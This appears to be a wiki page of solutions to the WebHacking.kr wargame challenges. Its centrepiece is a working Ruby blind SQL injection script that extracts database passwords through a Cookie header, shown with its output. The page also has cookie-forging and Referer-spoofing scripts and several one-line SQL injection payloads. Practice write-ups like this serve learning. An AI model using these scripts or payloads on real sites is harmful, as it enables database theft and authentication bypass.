Reverse..

WebHacking.kr

00. Register

  • HTML Comment tag
  • Base64 Decode
  • Source code(PHP) Reading
  • Cookie Managing

02. Blind SQL Injection

  • Blind SQL Injection
bsql.rb
#!/bin/env ruby
#encoding: utf-8
#by [email protected]
 
require 'uri'
require 'net/http'
require 'openssl'
 
class WebHackLv2
  MATCH = /2070-01-01 09:00:01/
  URL = 'http://webhacking.kr/challenge/web/web-02/index.php'
 
  def initialize(session, verbose = false)
    @session = session
    @verbose = verbose
  end
 
  def query(field, table = nil, filter = nil)
    puts sep if @verbose
    puts "Request => field: '#{field}', table: '#{table}', filter: '#{filter}'" if @verbose
    puts sep if @verbose
 
    puts "[Length]" if @verbose
    length = get_length(field, table, filter)
 
    puts "[String]" if @verbose
    result = get_string(length, field, table, filter)
 
    result
  end
 
  def get_length(field, table = nil, filter = nil)
    sql_query =  " SELECT LENGTH(#{field})"
    sql_query << " FROM #{table}" if table
    sql_query << " WHERE #{filter}" if filter
 
    # puts "Query: #{sql_query}" if @verbose
 
    length = (0x00..0xFF).bsearch do |index|
      header = {'Cookie' => "time=427760582 AND ((#{sql_query})<=#{index}) --; PHPSESSID=#{@session}"}
      true?(request(header))
    end
 
    puts "  *length: #{length}" if @verbose
    length
  end
 
  def get_string(length, field, table = nil, filter = nil)
    str = ''
 
    1.upto(length) do |len|
      sql_query =  " SELECT ORD(MID(#{field}, #{len}, 1))"
      sql_query << " FROM #{table}" if table
      sql_query << " WHERE #{filter}" if filter
 
      # puts "Query: #{sql_query}" if @verbose
 
      char = (0x00..0xFF).bsearch do |index|
        header = {'Cookie' => "time=1427760582 AND ((#{sql_query})<=#{index}) --; PHPSESSID=#{@session}"}
        true?(request(header))
      end
 
      str << char.chr
      puts "  *string: #{str}" if @verbose
    end
    str
  end
 
  def true?(body)
    body =~ MATCH ? true : false
  end
 
  def request(header)
    fetch(URL, header).body
  end
 
  def fetch(uri, header = {}, limit = 10)
    raise ArgumentError, 'too many HTTP redirects' if limit == 0
 
    header.merge!({'User-Agent' => 'lv2'})
    uri = URI(uri)
    response = false
 
    http = Net::HTTP.new(uri.host, uri.port)
    http.use_ssl = true if uri.scheme == "https"
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
    http.read_timeout = 500
 
    http.start do
      response = http.get((uri.path == '' ? "/" : uri.path) + (uri.query == nil ? "" : "?" + uri.query), header)
    end
 
    case response
    when Net::HTTPSuccess then
      response
    when Net::HTTPRedirection then
      location = response['location']
      warn "redirected to #{location}"
      fetch(location, limit - 1)
    else
      response.value
    end
  end
 
  def sep
    '-' * 64
  end
end
 
# ur session id
PHPSESSID = 'kumviv7k8g0qj77rmrodq7vbd7'
 
# verbose true
lv2 = WebHackLv2.new(PHPSESSID, true)
 
# inspect
puts lv2.query('version()')
puts lv2.query('database()')
puts lv2.query('@@port')
# gogo
puts lv2.query('password', 'admin')
puts lv2.query('password', 'FreeB0aRd')
 
#
# result:
# 
# $ bsql.rb
# ----------------------------------------------------------------
# Request => field: 'version()', table: '', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 14
# [String]
#   *string: 5
#   *string: 5.
#   *string: 5.5
#   *string: 5.5.
#   *string: 5.5.3
#   *string: 5.5.30
#   *string: 5.5.30-
#   *string: 5.5.30-M
#   *string: 5.5.30-Ma
#   *string: 5.5.30-Mar
#   *string: 5.5.30-Mari
#   *string: 5.5.30-Maria
#   *string: 5.5.30-MariaD
#   *string: 5.5.30-MariaDB
# 5.5.30-MariaDB
# ----------------------------------------------------------------
# Request => field: 'database()', table: '', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 9
# [String]
#   *string: o
#   *string: ol
#   *string: old
#   *string: oldz
#   *string: oldzo
#   *string: oldzom
#   *string: oldzomb
#   *string: oldzombi
#   *string: oldzombie
# oldzombie
# ----------------------------------------------------------------
# Request => field: '@@port', table: '', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 4
# [String]
#   *string: 3
#   *string: 33
#   *string: 330
#   *string: 3306
# 3306
# ----------------------------------------------------------------
# Request => field: 'password', table: 'admin', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 10
# [String]
#   *string: 0
#   *string: 0n
#   *string: 0nl
#   *string: 0nly
#   *string: 0nly_
#   *string: 0nly_a
#   *string: 0nly_ad
#   *string: 0nly_adm
#   *string: 0nly_admi
#   *string: 0nly_admin
# 0nly_admin
# ----------------------------------------------------------------
# Request => field: 'password', table: 'FreeB0aRd', filter: ''
# ----------------------------------------------------------------
# [Length]
#   *length: 9
# [String]
#   *string: 7
#   *string: 75
#   *string: 759
#   *string: 7598
#   *string: 75985
#   *string: 759852
#   *string: 7598522
#   *string: 7598522a
#   *string: 7598522ae
# 7598522ae
# 

03.

04. Digest::SHA1 & Base64

  • Digest::SHA1 hash
  • Base64 encode | decode
sha1.rb
require 'digest'
require 'base64'
 
puts Base64.strict_encode64(Digest::SHA1.hexdigest(Digest::SHA1.hexdigest('test')))
# => "YzQwMzNiZmY5NGI1NjdhMTkwZTMzZmFhNTUxZjQxMWNhZWY0NDRmMg=="

05.

  • Base64 encode | decode
  • Set-Cookie
base64_set-cookie.rb
#!ruby
#encoding: utf-8
#06. Base64 & set Cookie
 
require 'base64'
require 'open-uri'
 
def encode(str)
  20.times do
    str = Base64.strict_encode64(str)
  end
 
  str.gsub!('1', '!')
  str.gsub!('2', '@')
  str.gsub!('3', '$')
  str.gsub!('4', '^')
  str.gsub!('5', '&')
  str.gsub!('6', '*')
  str.gsub!('7', '(')
  str.gsub!('8', ')')
 
  URI.encode(str)
end
 
def fetch(session_id)
  uri = URI('http://webhacking.kr/challenge/web/web-06/')
  user = password = encode('admin')
  cookie = {'Cookie' => "user=#{user}; password=#{password}; PHPSESSID=#{session_id}"}
 
  uri.open(cookie) do |http|
    http.read
  end
end
 
 
puts fetch('ostf6f8t6ffuht25vkf3cb7n06')
 
# 
# <html>
# <head>
# <title>Challenge 6</title>
# <style type="text/css">
# body { background:black; color:white; font-size:10pt; }
# </style>
# </head>
# <body>
# 
# <font style=background:silver;color:black>&nbsp;&nbsp;HINT : base64&nbsp;&nbsp;</font><hr><a href=index.phps style=color:yellow;>index.phps</a><br><br>ID : admin<br>PW : admin<hr><script>alert('Congratulation!');</script><center><h1><br><br><hr><font color=gray>You have cleared the 6 problems.</font><br><br><font color=green><b>Score + 100</b></font><br><hr></h1></center>
# </body>
# </html>

07. SQL Injection

val=09)%09UNION%09SELECT%09(09-07

08. SQL Injection

  • User-Agent
  • HTTP_USER_AGENT

admin','admin','admin') #

09.

10. Javascript & Referer Header

  • Javascript
  • Referer Header
js_ref.rb
#!ruby
#encoding: utf-8
#10. Javascript & Referer Header
 
require 'open-uri'
 
def fetch(session_id)
  uri = URI('http://webhacking.kr/challenge/codeing/code1.html')
  referer = uri.to_s  
 
  uri.query = "go=800"
 
  header = {'Referer' => referer, 'Cookie' => "PHPSESSID=#{session_id}"}
 
  uri.open(header) do |http|
    http.read
  end
end
 
puts fetch('ostf6f8t6ffuht25vkf3cb7n06')

11. Regex

  • Regex

val=2fffff_14.50.138.202_%09p%09a%09s%09s

14. JavaScript

  • View Source
  • JavaScript Debugger
  • Breakpoint

15. JavaScript

  • View Source
  • Disable JavaScript

16. JavaScript

  • ASCII

irb(main):010:0> 124.chr ⇒ “|”

17. JavaScript

  • View Source
  • JavaScript Debugger
  • Breakpoint

18. SQL Injection

  • SQL Injection
  • OR and AND

no=12%0AOR%0A12%0AAND%0Ano=2

Discussion

Enter your comment. Wiki syntax is allowed:
  _____     __  ____   ___    __ 
 / ___/ __ / / /_  /  / _ \  / / 
/ /__  / // /   / /_ / ___/ / /__
\___/  \___/   /___//_/    /____/